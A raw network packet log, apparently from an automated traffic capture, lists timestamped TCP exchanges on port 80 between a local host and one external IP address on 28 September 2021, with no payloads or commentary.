Sep 28, 2021 07:14:08.920968056 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920980930 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920989037 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921009064 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921031952 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921052933 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.921052933 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921073914 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921092987 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.921093941 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921116114 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921137094 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921155930 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.921155930 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921176910 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921200037 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921221972 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921242952 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.921242952 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921269894 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921292067 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921294928 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.921300888 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.921312094 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921331882 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921344042 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.921351910 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921370983 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.921380043 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.921416044 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.921638012 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.923202038 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.923239946 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.923327923 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.923723936 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.935255051 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.935306072 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.935333014 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.935357094 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.935388088 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.935419083 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.935420036 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.935439110 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.935460091 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.935477018 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.935506105 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.956655025 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.956691027 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.956779003 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.956854105 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.956911087 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.956955910 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.956990957 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957001925 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957020998 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957051039 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957053900 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957092047 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957118988 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957134962 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957139969 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957159996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957165956 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957180023 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957204103 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957214117 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957272053 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957298040 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957376003 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957415104 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957443953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957489014 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957509041 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957539082 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957562923 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957587004 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957593918 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957636118 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957638979 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957669020 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957691908 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957729101 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957731009 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957757950 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957766056 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957787037 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957806110 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957838058 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957845926 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957860947 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957881927 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.957914114 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957954884 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.957998037 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958005905 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958107948 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958146095 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958161116 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958167076 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958184958 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958188057 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958208084 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958225012 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958231926 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958254099 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958270073 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958275080 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958296061 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958317041 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958317995 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958337069 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958355904 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958357096 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958378077 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958395004 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958401918 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958425045 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958446026 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958467007 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958467007 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958487988 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958506107 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958507061 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958528996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958532095 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958550930 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958570004 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958601952 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958622932 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958642960 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958643913 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958667040 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958692074 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958702087 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958728075 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958741903 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958750010 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958770990 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958791971 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958802938 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958837986 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958837986 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958861113 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958880901 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958897114 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.958904028 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.958939075 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.959427118 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.959599972 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.959625959 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.959738970 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.961431980 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.971889019 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.971925020 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.971951962 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.971975088 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.972276926 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.972286940 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.972320080 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.972346067 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.972368002 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.972472906 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.995796919 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.995834112 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.995920897 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.995943069 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996046066 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996097088 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996097088 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996120930 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996140957 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996162891 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996164083 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996200085 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996222973 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996222973 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996248007 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996284962 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996309996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996351957 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996398926 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996419907 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996448040 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996490002 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996494055 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996545076 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996568918 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996587992 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996588945 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996614933 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996645927 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996670008 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996696949 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996700048 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996731997 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996753931 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996779919 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996809006 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996829987 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996834040 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996880054 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996881008 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996906996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.996948957 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.996987104 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997039080 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997087002 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997096062 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997148991 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997172117 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997195005 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997206926 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997253895 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997271061 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997353077 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997395039 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997397900 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997421980 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997442007 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997462034 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997462988 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997483015 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997503996 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997507095 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997529984 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997548103 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997550011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997571945 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997591972 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997592926 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997615099 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997636080 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997646093 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997658968 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997684002 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997692108 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997706890 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997728109 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997746944 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997764111 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997783899 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997786045 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997807980 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997828960 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997832060 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997850895 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997872114 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997872114 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997896910 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997915983 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997917891 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997975111 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.997977972 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.997997999 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.998020887 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.998043060 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.998044014 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.998076916 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.998092890 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.998097897 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.998131037 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.998147964 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.998150110 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.998169899 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.998192072 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.998193979 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.998214960 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.998233080 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.999102116 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.007847071 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.007896900 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.007920027 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.007939100 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.007958889 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.007978916 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.008002996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.008007050 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.008025885 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.008089066 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.034714937 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.034760952 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.034787893 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.034811020 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.034941912 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.035258055 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035296917 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035330057 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035352945 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035392046 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035398006 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.035428047 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035454035 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035459042 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.035487890 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035501957 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.035515070 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035542965 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035558939 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.035578012 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035602093 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035633087 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035655975 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035670996 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.035691977 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035713911 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035725117 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.035748005 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035783052 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035784006 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.035814047 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035815001 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.035849094 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035862923 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.035880089 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035912037 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035938978 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.035944939 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.035979986 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036011934 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036012888 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036045074 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036056995 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036072969 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036127090 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036129951 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036165953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036197901 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036207914 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:09.036231041 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036252975 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036282063 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036300898 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:09.036303043 CEST	49751	80	192.168.2.4	185.138.164.150
